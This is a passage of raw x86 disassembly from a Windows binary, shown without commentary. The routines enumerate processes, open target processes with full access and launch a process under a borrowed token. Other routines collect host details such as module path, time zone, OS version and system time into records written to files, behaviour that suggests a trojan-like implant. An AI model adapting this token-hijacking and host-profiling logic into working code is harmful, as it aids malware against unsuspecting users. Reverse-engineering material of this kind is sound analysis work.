mov ebx, eax
cmp ebx, 0FFFFFFFFh
jnz short loc_40AE93
xor eax, eax
jmp loc_40B02C
; ---------------------------------------------------------------------------
loc_40AE93: ; CODE XREF: sub_40AE6F+1B�j
test byte ptr dword_40FC20, 1
mov [ebp+var_4], 103h
jz short loc_40AEC1
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_640]
push eax
call dword_40FBC4
test eax, eax
jnz short loc_40AED6
mov [ebp+var_640], di
jmp short loc_40AED6
; ---------------------------------------------------------------------------
loc_40AEC1: ; CODE XREF: sub_40AE6F+32�j
mov eax, dword_40FB34
push dword ptr [eax+20h]
lea eax, [ebp+var_640]
push eax
call dword_40FD98 ; lstrcpyW
loc_40AED6: ; CODE XREF: sub_40AE6F+47�j
; sub_40AE6F+50�j
mov eax, dword_40FC20
not eax
push esi
and eax, 1
push 1
or eax, 24h
push eax
lea eax, [ebp+var_C58]
push eax
push edi
mov [ebp+var_4], edi
call dword_40FBA8
lea eax, [ebp+var_438]
push eax
push ebx
mov [ebp+var_438], 22Ch
call dword_40FE18 ; Process32FirstW
jmp loc_40B019
; ---------------------------------------------------------------------------
loc_40AF15: ; CODE XREF: sub_40AE6F+1AC�j
push [ebp+arg_0]
lea eax, [ebp+var_414]
push eax
call dword_40FD88 ; lstrcmpiW
test eax, eax
jnz loc_40B00B
push [ebp+var_430]
push edi
push 1F0FFFh
call dword_40FE34 ; OpenProcess
mov esi, eax
cmp esi, edi
jz loc_40B00B
push 104h
lea eax, [ebp+var_20C]
push eax
push edi
push esi
call dword_40FCAC
test eax, eax
jz loc_40B004
push [ebp+arg_0]
lea eax, [ebp+var_C58]
push eax
lea eax, [ebp+var_848]
push eax
call dword_40FC8C
cmp [ebp+var_20C], 5Ch
jnz short loc_40AFB3
cmp [ebp+var_20A], 3Fh
jnz short loc_40AFB3
cmp [ebp+var_208], 3Fh
jnz short loc_40AFB3
cmp [ebp+var_206], 5Ch
jnz short loc_40AFB3
lea eax, [ebp+var_848]
push eax
lea eax, [ebp+var_204]
jmp short loc_40AFC0
; ---------------------------------------------------------------------------
loc_40AFB3: ; CODE XREF: sub_40AE6F+115�j
; sub_40AE6F+11F�j ...
lea eax, [ebp+var_848]
push eax
lea eax, [ebp+var_20C]
loc_40AFC0: ; CODE XREF: sub_40AE6F+142�j
push eax
call dword_40FD88 ; lstrcmpiW
cmp eax, edi
jnz short loc_40B004
cmp [ebp+var_4], edi
jnz short loc_40AFD9
mov eax, [ebp+var_430]
mov [ebp+var_4], eax
loc_40AFD9: ; CODE XREF: sub_40AE6F+15F�j
lea eax, [ebp+var_A50]
push eax
push esi
call sub_40A137
test al, al
pop ecx
pop ecx
jz short loc_40B004
lea eax, [ebp+var_640]
push eax
lea eax, [ebp+var_A50]
push eax
call dword_40FD88 ; lstrcmpiW
test eax, eax
jz short loc_40B030
loc_40B004: ; CODE XREF: sub_40AE6F+F0�j
; sub_40AE6F+15A�j ...
push esi
call dword_40FDAC ; CloseHandle
loc_40B00B: ; CODE XREF: sub_40AE6F+B8�j
; sub_40AE6F+D4�j
lea eax, [ebp+var_438]
push eax
push ebx
call dword_40FE1C ; Process32NextW
loc_40B019: ; CODE XREF: sub_40AE6F+A1�j
test eax, eax
jnz loc_40AF15
push ebx
call dword_40FDAC ; CloseHandle
mov eax, [ebp+var_4]
loc_40B02B: ; CODE XREF: sub_40AE6F+1D5�j
pop esi
loc_40B02C: ; CODE XREF: sub_40AE6F+1F�j
pop edi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40B030: ; CODE XREF: sub_40AE6F+193�j
push esi
call dword_40FDAC ; CloseHandle
push ebx
call dword_40FDAC ; CloseHandle
mov eax, [ebp+var_430]
jmp short loc_40B02B
sub_40AE6F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B046 proc near ; CODE XREF: sub_403723+1B1�p
; sub_407164+126�p
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_30 = dword ptr -30h
var_2A = word ptr -2Ah
var_28 = dword ptr -28h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 5Ch
push ebx
xor ebx, ebx
cmp byte ptr [ebp+arg_0], bl
push esi
mov [ebp+var_5C], 44h
mov [ebp+var_30], ebx
mov [ebp+var_54], ebx
mov [ebp+var_50], ebx
mov [ebp+var_2A], bx
mov [ebp+var_28], ebx
mov [ebp+var_58], ebx
jz loc_40B117
call sub_40A062
test al, al
jz loc_40B117
lea eax, [ebp+var_4]
push eax
mov [ebp+arg_0], ebx
mov [ebp+var_4], ebx
call dword_40FB00
push eax
call dword_40FAFC
push [ebp+var_4]
push ebx
push 400h
call dword_40FE34 ; OpenProcess
mov esi, eax
cmp esi, ebx
jz short loc_40B0E8
lea eax, [ebp+var_8]
push eax
push 0Bh
push esi
call dword_40FBD0
test eax, eax
jz short loc_40B0E1
lea eax, [ebp+arg_0]
push eax
push 1
push 2
push ebx
push 0Bh
push [ebp+var_8]
call dword_40FC00
test eax, eax
jnz short loc_40B0D8
mov [ebp+arg_0], ebx
loc_40B0D8: ; CODE XREF: sub_40B046+8D�j
push [ebp+var_8]
call dword_40FDAC ; CloseHandle
loc_40B0E1: ; CODE XREF: sub_40B046+75�j
push esi
call dword_40FDAC ; CloseHandle
loc_40B0E8: ; CODE XREF: sub_40B046+64�j
cmp [ebp+arg_0], ebx
jz short loc_40B14E
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_5C]
push eax
push ebx
push ebx
push ebx
push ebx
push ebx
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_40FBFC
push [ebp+arg_0]
mov esi, eax
call dword_40FDAC ; CloseHandle
jmp short loc_40B133
; ---------------------------------------------------------------------------
loc_40B117: ; CODE XREF: sub_40B046+27�j
; sub_40B046+34�j
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_5C]
push eax
push ebx
push ebx
push ebx
push ebx
push ebx
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
call dword_40FE58 ; CreateProcessW
mov esi, eax
loc_40B133: ; CODE XREF: sub_40B046+CF�j
cmp esi, ebx
jz short loc_40B14E
push [ebp+var_18]
call dword_40FDAC ; CloseHandle
push [ebp+var_14]
call dword_40FDAC ; CloseHandle
mov eax, [ebp+var_10]
jmp short loc_40B150
; ---------------------------------------------------------------------------
loc_40B14E: ; CODE XREF: sub_40B046+A5�j
; sub_40B046+EF�j
xor eax, eax
loc_40B150: ; CODE XREF: sub_40B046+106�j
pop esi
pop ebx
leave
retn
sub_40B046 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B154 proc near ; CODE XREF: sub_40CBC4+137�p
; sub_40E286+98�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_40A476
xor ebx, ebx
cmp [ebp+var_4], ebx
pop ecx
pop ecx
mov esi, eax
jz short loc_40B19A
push [ebp+arg_8]
push [ebp+arg_4]
call dword_40FD94 ; lstrlenA
push eax
push [ebp+arg_4]
mov eax, [ebp+var_4]
push esi
call sub_40A3EB
push [ebp+var_4]
test eax, eax
setnz bl
call sub_409317
add esp, 14h
loc_40B19A: ; CODE XREF: sub_40B154+1B�j
pop esi
mov al, bl
pop ebx
leave
retn
sub_40B154 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B1A0 proc near ; CODE XREF: sub_406FA6+D�p
; sub_406FDE+D�p
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
lea eax, [ebp+var_8]
push eax
push [ebp+arg_0]
call sub_40A476
cmp [ebp+var_8], 0
pop ecx
pop ecx
mov ebx, eax
mov [ebp+var_1], 0
jz short loc_40B22B
push edi
push [ebp+arg_8]
push [ebp+arg_4]
call dword_40FD94 ; lstrlenA
push eax
push [ebp+arg_4]
mov eax, [ebp+var_8]
push ebx
call sub_40A3EB
mov edi, eax
add esp, 10h
test edi, edi
jz short loc_40B221
push esi
push edi
call dword_40FD94 ; lstrlenA
mov esi, eax
mov eax, [ebp+var_8]
inc esi
sub eax, esi
sub eax, edi
add eax, ebx
push eax
lea eax, [esi+edi]
push eax
push edi
call sub_409331
sub ebx, esi
add esp, 0Ch
cmp ebx, 1
pop esi
jnz short loc_40B20F
xor ebx, ebx
loc_40B20F: ; CODE XREF: sub_40B1A0+6B�j
push ebx
push [ebp+var_8]
push [ebp+arg_0]
call sub_40A4C3
add esp, 0Ch
mov [ebp+var_1], al
loc_40B221: ; CODE XREF: sub_40B1A0+41�j
push [ebp+var_8]
call sub_409317
pop ecx
pop edi
loc_40B22B: ; CODE XREF: sub_40B1A0+1E�j
mov al, [ebp+var_1]
pop ebx
leave
retn
sub_40B1A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B231 proc near ; CODE XREF: sub_403F78+21�p
; sub_404034+1B�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
sub esp, 0Ch
cmp eax, [ebp+arg_4]
jb short loc_40B243
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_40B243: ; CODE XREF: sub_40B231+C�j
and [ebp+var_4], 0
push ebx
push esi
push edi
mov edi, [ebp+arg_8]
and dword ptr [edi], 0
mov [ebp+var_C], eax
loc_40B253: ; CODE XREF: sub_40B231+96�j
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_10]
jnb short loc_40B2C9
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409090
add esp, 10h
test al, al
jz short loc_40B2C9
mov esi, [ebp+var_C]
mov eax, esi
sub eax, [ebp+var_8]
inc eax
push eax
push [ebp+var_8]
call sub_40A747
mov ebx, eax
test ebx, ebx
pop ecx
pop ecx
mov [ebp+var_8], ebx
jz short loc_40B2C9
mov eax, [ebp+var_4]
lea eax, ds:4[eax*4]
push eax
push dword ptr [edi]
call sub_40A91F
test eax, eax
pop ecx
pop ecx
mov [edi], eax
jz short loc_40B2C9
mov ecx, [ebp+var_4]
inc [ebp+var_4]
mov [eax+ecx*4], ebx
xor eax, eax
cmp byte ptr [esi+1], 22h
setz al
inc eax
add eax, esi
cmp eax, [ebp+arg_4]
mov [ebp+arg_0], eax
jb short loc_40B253
loc_40B2C9: ; CODE XREF: sub_40B231+28�j
; sub_40B231+42�j ...
mov eax, [ebp+arg_C]
test eax, eax
pop edi
pop esi
pop ebx
jz short loc_40B2DF
mov ecx, [ebp+arg_0]
cmp ecx, [ebp+arg_4]
sbb edx, edx
and edx, ecx
mov [eax], edx
loc_40B2DF: ; CODE XREF: sub_40B231+A0�j
mov eax, [ebp+var_4]
leave
retn
sub_40B231 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B2E4 proc near ; CODE XREF: sub_404AAD+D9�p
; sub_404AAD+10E�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_0]
xor ebx, ebx
cmp esi, ebx
jz short loc_40B335
cmp [ebp+arg_4], ebx
jz short loc_40B335
push edi
push [ebp+arg_4]
call dword_40FD94 ; lstrlenA
mov edi, eax
mov eax, [esi]
inc edi
cmp eax, ebx
jz short loc_40B313
push eax
call dword_40FD94 ; lstrlenA
mov ebx, eax
loc_40B313: ; CODE XREF: sub_40B2E4+24�j
lea eax, [ebx+edi]
push eax
push dword ptr [esi]
call sub_40A91F
test eax, eax
pop ecx
pop ecx
pop edi
jnz short loc_40B33B
cmp [ebp+arg_8], al
jz short loc_40B335
push dword ptr [esi]
call sub_409317
and dword ptr [esi], 0
pop ecx
loc_40B335: ; CODE XREF: sub_40B2E4+C�j
; sub_40B2E4+11�j ...
xor al, al
loc_40B337: ; CODE XREF: sub_40B2E4+67�j
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40B33B: ; CODE XREF: sub_40B2E4+3F�j
push [ebp+arg_4]
mov [esi], eax
add eax, ebx
push eax
call dword_40FDA0 ; lstrcpyA
mov al, 1
jmp short loc_40B337
sub_40B2E4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B34D proc near ; CODE XREF: sub_404AAD+36�p
; sub_405E38+9F�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push ebx
push esi
mov esi, [ebp+arg_8]
push edi
mov edi, [ebp+arg_0]
add eax, edi
xor ebx, ebx
mov [ebp+arg_4], eax
mov [esi], ebx
cmp edi, eax
jmp short loc_40B3A7
; ---------------------------------------------------------------------------
loc_40B369: ; CODE XREF: sub_40B34D:loc_40B3AA�j
mov al, [edi]
inc edi
cmp al, 0Ah
jz short loc_40B375
cmp edi, [ebp+arg_4]
jnz short loc_40B3AA
loc_40B375: ; CODE XREF: sub_40B34D+21�j
mov eax, [esi]
lea eax, ds:4[eax*4]
push eax
push ebx
call sub_40A91F
mov ebx, eax
test ebx, ebx
pop ecx
pop ecx
jz short loc_40B3B3
mov eax, edi
sub eax, [ebp+arg_0]
push eax
push [ebp+arg_0]
call sub_40A747
pop ecx
pop ecx
mov ecx, [esi]
mov [ebx+ecx*4], eax
inc dword ptr [esi]
cmp edi, [ebp+arg_4]
loc_40B3A7: ; CODE XREF: sub_40B34D+1A�j
mov [ebp+arg_0], edi
loc_40B3AA: ; CODE XREF: sub_40B34D+26�j
jb short loc_40B369
mov eax, ebx
loc_40B3AE: ; CODE XREF: sub_40B34D+75�j
pop edi
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40B3B3: ; CODE XREF: sub_40B34D+3E�j
push dword ptr [esi]
push ebx
call sub_4093AC
and dword ptr [esi], 0
pop ecx
pop ecx
xor eax, eax
jmp short loc_40B3AE
sub_40B34D endp
; =============== S U B R O U T I N E =======================================
sub_40B3C4 proc near ; CODE XREF: sub_403C06+5A�p
; sub_403F78+4E�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_4]
mov esi, [esp+8+arg_0]
push dword ptr [esi]
call sub_40A91F
test eax, eax
pop ecx
pop ecx
jnz short loc_40B3DE
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_40B3DE: ; CODE XREF: sub_40B3C4+14�j
mov [esi], eax
mov al, 1
pop esi
retn
sub_40B3C4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B3E4 proc near ; CODE XREF: sub_406F8C+D�p
; sub_406FC4+D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push esi
mov esi, [ebp+arg_4]
cmp byte ptr [esi], 0
jnz short loc_40B3F8
xor al, al
jmp loc_40B49D
; ---------------------------------------------------------------------------
loc_40B3F8: ; CODE XREF: sub_40B3E4+B�j
push ebx
push edi
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_40A476
pop ecx
pop ecx
push esi
mov ebx, eax
call dword_40FD94 ; lstrlenA
mov esi, [ebp+var_4]
test esi, esi
mov edi, eax
jz short loc_40B456
push ebx
push esi
call sub_408CAE
test al, al
pop ecx
pop ecx
jnz short loc_40B435
push esi
call sub_409317
xor ebx, ebx
pop ecx
mov [ebp+var_4], ebx
jmp short loc_40B45B
; ---------------------------------------------------------------------------
loc_40B435: ; CODE XREF: sub_40B3E4+41�j
push [ebp+arg_8]
mov eax, esi
push edi
push [ebp+arg_4]
push ebx
call sub_40A3EB
add esp, 10h
test eax, eax
jz short loc_40B456
push esi
call sub_409317
pop ecx
mov al, 1
jmp short loc_40B49B
; ---------------------------------------------------------------------------
loc_40B456: ; CODE XREF: sub_40B3E4+34�j
; sub_40B3E4+65�j
test ebx, ebx
jz short loc_40B45B
dec ebx
loc_40B45B: ; CODE XREF: sub_40B3E4+4F�j
; sub_40B3E4+74�j
lea esi, [edi+ebx]
lea eax, [esi+2]
push eax
lea eax, [ebp+var_4]
push eax
call sub_40B3C4
test al, al
pop ecx
pop ecx
jz short loc_40B499
inc edi
push edi
mov edi, [ebp+var_4]
push [ebp+arg_4]
lea eax, [edi+ebx]
push eax
call sub_409331
mov byte ptr [edi+esi+1], 0
add esi, 2
push esi
push edi
push [ebp+arg_0]
call sub_40A4C3
add esp, 18h
jmp short loc_40B49B
; ---------------------------------------------------------------------------
loc_40B499: ; CODE XREF: sub_40B3E4+8B�j
xor al, al
loc_40B49B: ; CODE XREF: sub_40B3E4+70�j
; sub_40B3E4+B3�j
pop edi
pop ebx
loc_40B49D: ; CODE XREF: sub_40B3E4+F�j
pop esi
leave
retn
sub_40B3E4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=78h
sub_40B4A0 proc near ; CODE XREF: sub_404222+9E�p
; .text:004055F5�p ...
var_2B4 = byte ptr -2B4h
var_AC = word ptr -0ACh
var_66 = word ptr -66h
var_58 = dword ptr -58h
var_12 = word ptr -12h
var_4 = dword ptr -4
push ebp
lea ebp, [esp-78h]
sub esp, 2B4h
push esi
mov esi, offset dword_4100E0
push esi
call sub_409CBA
mov eax, dword_40FB34
pop ecx
push dword ptr [eax+4]
push dword ptr [eax]
lea eax, [ebp+78h+var_2B4]
push eax
call dword_40FC8C
lea eax, [ebp+78h+var_2B4]
push eax
push esi
push esi
call dword_40FC8C
push 103h
push offset byte_40FEC0
push 0
mov byte_40FEC0, 0
call dword_40FD74 ; GetModuleFileNameA
mov byte_40FFC5, al
lea eax, [ebp+78h+var_AC]
push eax
call dword_40FD54 ; GetTimeZoneInformation
mov ax, [ebp+78h+var_12]
mov cx, [ebp+78h+var_66]
neg ax
push offset dword_40FFC8
mov dword_40FFC8, 114h
sbb eax, eax
and eax, [ebp+78h+var_4]
neg cx
sbb ecx, ecx
and ecx, [ebp+78h+var_58]
and word_40FFDC, 0
add ax, cx
add ax, [ebp+78h+var_AC]
mov word_4100DC, ax
call dword_40FD58 ; GetVersionExW
push offset word_40FFDC
call dword_40FD90 ; lstrlenW
cmp eax, 0Eh
jl short loc_40B574
mov eax, dword_40FFF6
add eax, 0FFFFFFCFh
cmp ax, 8
ja short loc_40B574
mov al, byte ptr dword_40FFF6
sub al, 30h
mov byte_40FFC4, al
jmp short loc_40B57B
; ---------------------------------------------------------------------------
loc_40B574: ; CODE XREF: sub_40B4A0+B6�j
; sub_40B4A0+C4�j
mov byte_40FFC4, 0
loc_40B57B: ; CODE XREF: sub_40B4A0+D2�j
mov eax, esi
pop esi
add ebp, 78h
leave
retn
sub_40B4A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B583 proc near ; CODE XREF: sub_404D6D+38E�p
; .text:0040C4F1�p ...
var_30 = byte ptr -30h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 30h
cmp [ebp+arg_8], 0A00000h
jnb locret_40B84E
push ebx
push esi
push edi
call dword_40FE50 ; GetCurrentThread
mov ebx, eax
push ebx
mov [ebp+var_C], ebx
call dword_40FE4C ; GetThreadPriority
push 2
push ebx
mov [ebp+var_8], eax
call dword_40FE48 ; SetThreadPriority
movzx eax, byte_40FFC5
mov ecx, [ebp+arg_8]
lea eax, [eax+ecx+2Dh]
push eax
call sub_4092F9
mov esi, eax
xor edi, edi
cmp esi, edi
pop ecx
jnz short loc_40B5DD
push [ebp+var_8]
push ebx
jmp loc_40B75C
; ---------------------------------------------------------------------------
loc_40B5DD: ; CODE XREF: sub_40B583+4F�j
lea eax, [ebp+arg_C]
push eax
push [ebp+arg_4]
movzx eax, byte_40FFC5
push [ebp+arg_8]
lea eax, [eax+esi+2Ch]
push eax
call dword_40FC80
movzx eax, byte_40FFC5
lea eax, [eax+esi+2Ch]
push eax
call dword_40FD94 ; lstrlenA
mov [ebp+arg_8], eax
call dword_40FDE8 ; GetTickCount
mov [ebp+var_18], eax
lea eax, [ebp+var_30]
push eax
mov [ebp+var_14], 2Ch
call dword_40FE8C ; GetSystemTime
push 4
pop ebx
push ebx
lea eax, [ebp+arg_0]
push eax
push esi
call sub_409331
push 2
lea eax, [ebp+var_14]
push eax
lea eax, [esi+4]
push eax
call sub_409331
push 1
lea eax, [esi+6]
push offset byte_40FFC5
push eax
call sub_409331
mov eax, dword_40FC1C
add eax, 40h
push 2
push eax
lea eax, [esi+7]
push eax
call sub_409331
push ebx
lea eax, [ebp+arg_8]
push eax
lea eax, [esi+9]
push eax
call sub_409331
push 10h
lea eax, [ebp+var_30]
push eax
lea eax, [esi+0Dh]
push eax
call sub_409331
add esp, 48h
push 2
lea eax, [esi+1Dh]
push offset word_4100DC
push eax
call sub_409331
push 1
lea eax, [esi+1Fh]
push offset dword_40FFCC
push eax
call sub_409331
push 1
lea eax, [esi+20h]
push offset dword_40FFD0
push eax
call sub_409331
push ebx
lea eax, [esi+21h]
push offset dword_40FFD4
push eax
call sub_409331
push 1
push offset byte_40FFC4
lea eax, [esi+25h]
push eax
call sub_409331
push ebx
lea eax, [ebp+var_18]
push eax
lea eax, [esi+26h]
push eax
call sub_409331
add esp, 48h
push 2
lea eax, [esi+2Ah]
push offset word_40FBAC
push eax
call sub_409331
movzx eax, byte_40FFC5
push eax
lea eax, [esi+2Ch]
push offset byte_40FEC0
push eax
call sub_409331
mov ecx, [ebp+arg_8]
lea eax, [ebp+var_10]
push eax
movzx eax, byte_40FFC5
lea eax, [eax+ecx+2Ch]
push eax
push esi
mov [ebp+var_10], esi
call sub_409A0E
push esi
mov [ebp+arg_8], eax
call sub_409317
add esp, 28h
cmp [ebp+arg_8], edi
jz short loc_40B756
call sub_409E6A
mov eax, dword_40FB34
push dword ptr [eax+24h]
call sub_409B48
cmp eax, edi
pop ecx
mov [ebp+var_20], eax
jnz short loc_40B767
loc_40B756: ; CODE XREF: sub_40B583+1B7�j
push [ebp+var_8]
push [ebp+var_C]
loc_40B75C: ; CODE XREF: sub_40B583+55�j
call dword_40FE48 ; SetThreadPriority
jmp loc_40B84B
; ---------------------------------------------------------------------------
loc_40B767: ; CODE XREF: sub_40B583+1D1�j
mov eax, dword_40FB34
push edi
push edi
push edi
push edi
push 8
push dword ptr [eax+30h]
call sub_4095AA
add esp, 18h
push edi
push edi
push ebx
push edi
push edi
push 40000000h
push offset dword_4100E0
call dword_40FDC0 ; CreateFileW
mov esi, eax
cmp esi, 0FFFFFFFFh
jz loc_40B821
push 2
push edi
push edi
push esi
mov [ebp+var_1C], 48414C4Ch
call dword_40FDC8 ; SetFilePointer
push edi
lea eax, [ebp+var_4]
push eax
push ebx
lea eax, [ebp+var_1C]
push eax
push esi
call dword_40FDF0 ; WriteFile
test eax, eax
jz short loc_40B813
cmp [ebp+var_4], ebx
jnz short loc_40B813
push edi
lea eax, [ebp+var_4]
push eax
push ebx
lea eax, [ebp+arg_8]
push eax
push esi
call dword_40FDF0 ; WriteFile
test eax, eax
jnz short loc_40B7E5
push 1
push edi
push 0FFFFFFFCh
jmp short loc_40B800
; ---------------------------------------------------------------------------
loc_40B7E5: ; CODE XREF: sub_40B583+259�j
push edi
lea eax, [ebp+var_4]
push eax
push [ebp+arg_8]
push [ebp+var_10]
push esi
call dword_40FDF0 ; WriteFile
test eax, eax
jnz short loc_40B813
push 1
push edi
push 0FFFFFFF8h
loc_40B800: ; CODE XREF: sub_40B583+260�j
pop eax
sub eax, [ebp+var_4]
push eax
push esi
call dword_40FDC8 ; SetFilePointer
push esi
call dword_40FDF8 ; SetEndOfFile
loc_40B813: ; CODE XREF: sub_40B583+23F�j
; sub_40B583+244�j ...
push esi
call dword_40FE00 ; FlushFileBuffers
push esi
call dword_40FDAC ; CloseHandle
loc_40B821: ; CODE XREF: sub_40B583+214�j
push [ebp+var_8]
push [ebp+var_C]
call dword_40FE48 ; SetThreadPriority
mov eax, dword_40FB34
push edi
push edi
push edi
push edi
push 7
push dword ptr [eax+30h]
call sub_4095AA
push [ebp+var_20]
call sub_409B7F
add esp, 1Ch
loc_40B84B: ; CODE XREF: sub_40B583+1DF�j
pop edi
pop esi
pop ebx
locret_40B84E: ; CODE XREF: sub_40B583+D�j
leave
retn
sub_40B583 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B850 proc near ; CODE XREF: sub_40325F+103�p
; sub_4033DA+7E�p ...
var_448 = byte ptr -448h
var_240 = byte ptr -240h
var_38 = byte ptr -38h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 448h
cmp [ebp+arg_8], 0A00000h
jbe short loc_40B866
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_40B866: ; CODE XREF: sub_40B850+10�j
push ebx
xor ebx, ebx
cmp [ebp+arg_8], ebx
jnz short loc_40B875
mov al, 1
jmp loc_40BA12
; ---------------------------------------------------------------------------
loc_40B875: ; CODE XREF: sub_40B850+1C�j
cmp [ebp+arg_0], ebx
jnz short loc_40B881
xor al, al
jmp loc_40BA12
; ---------------------------------------------------------------------------
loc_40B881: ; CODE XREF: sub_40B850+28�j
push edi
push 0FFFFFFFFh
push [ebp+arg_0]
call sub_40A6F7
mov edi, eax
cmp edi, ebx
pop ecx
pop ecx
jnz short loc_40B89B
xor al, al
jmp loc_40BA11
; ---------------------------------------------------------------------------
loc_40B89B: ; CODE XREF: sub_40B850+42�j
call dword_40FDE8 ; GetTickCount
mov [ebp+var_8], eax
call sub_409E6A
lea eax, [ebp+var_448]
push eax
call sub_409CBA
mov eax, dword_40FB34
pop ecx
push dword ptr [eax]
lea eax, [ebp+var_448]
push eax
push eax
call dword_40FC8C
jmp short loc_40B8D0
; ---------------------------------------------------------------------------
loc_40B8CD: ; CODE XREF: sub_40B850+C4�j
inc [ebp+var_8]
loc_40B8D0: ; CODE XREF: sub_40B850+7B�j
push [ebp+var_8]
mov eax, dword_40FB34
push dword ptr [eax+18Ch]
lea eax, [ebp+var_38]
push 13h
push eax
call dword_40FC84
add esp, 10h
lea eax, [ebp+var_38]
push eax
lea eax, [ebp+var_448]
push eax
lea eax, [ebp+var_240]
push eax
call dword_40FC8C
lea eax, [ebp+var_240]
push eax
call dword_40FC94
test eax, eax
jnz short loc_40B8CD
push esi
push ebx
push 2
push 2
push ebx
push ebx
push 40000000h
lea eax, [ebp+var_240]
push eax
mov [ebp+var_1], bl
call dword_40FDC0 ; CreateFileW
mov esi, eax
cmp esi, 0FFFFFFFFh
jz loc_40BA0D
lea eax, [ebp+var_C]
push eax
push edi
call dword_40FD94 ; lstrlenA
push eax
push edi
call sub_409A0E
add esp, 0Ch
cmp eax, ebx
mov [ebp+var_8], eax
jz loc_40B9F4
push ebx
lea eax, [ebp+var_10]
push eax
push 4
lea eax, [ebp+var_8]
push eax
push esi
call dword_40FDF0 ; WriteFile
mov edi, eax
cmp edi, ebx
jz short loc_40B98A
push ebx
lea eax, [ebp+var_10]
push eax
push [ebp+var_8]
push [ebp+var_C]
push esi
call dword_40FDF0 ; WriteFile
mov edi, eax
loc_40B98A: ; CODE XREF: sub_40B850+124�j
push [ebp+var_C]
call sub_409317
cmp edi, ebx
pop ecx
jz short loc_40B9F4
lea eax, [ebp+var_C]
push eax
push [ebp+arg_8]
push [ebp+arg_4]
call sub_409A0E
add esp, 0Ch
cmp eax, ebx
mov [ebp+var_8], eax
jz short loc_40B9F4
push ebx
lea eax, [ebp+var_10]
push eax
push 4
lea eax, [ebp+var_8]
push eax
push esi
call dword_40FDF0 ; WriteFile
mov edi, eax
cmp edi, ebx
jz short loc_40B9DC
push ebx
lea eax, [ebp+var_10]
push eax
push [ebp+var_8]
push [ebp+var_C]
push esi
call dword_40FDF0 ; WriteFile
mov edi, eax
loc_40B9DC: ; CODE XREF: sub_40B850+176�j
push [ebp+var_C]
call sub_409317
cmp edi, ebx
pop ecx
jz short loc_40B9F4
push esi
call dword_40FE00 ; FlushFileBuffers
mov [ebp+var_1], 1
loc_40B9F4: ; CODE XREF: sub_40B850+108�j
; sub_40B850+145�j ...
push esi
call dword_40FDAC ; CloseHandle
cmp [ebp+var_1], bl
jnz short loc_40BA0D
lea eax, [ebp+var_240]
push eax
call sub_409B2C
pop ecx
loc_40BA0D: ; CODE XREF: sub_40B850+E8�j
; sub_40B850+1AE�j
mov al, [ebp+var_1]
pop esi
loc_40BA11: ; CODE XREF: sub_40B850+46�j
pop edi
loc_40BA12: ; CODE XREF: sub_40B850+20�j
; sub_40B850+2C�j
pop ebx
leave
retn
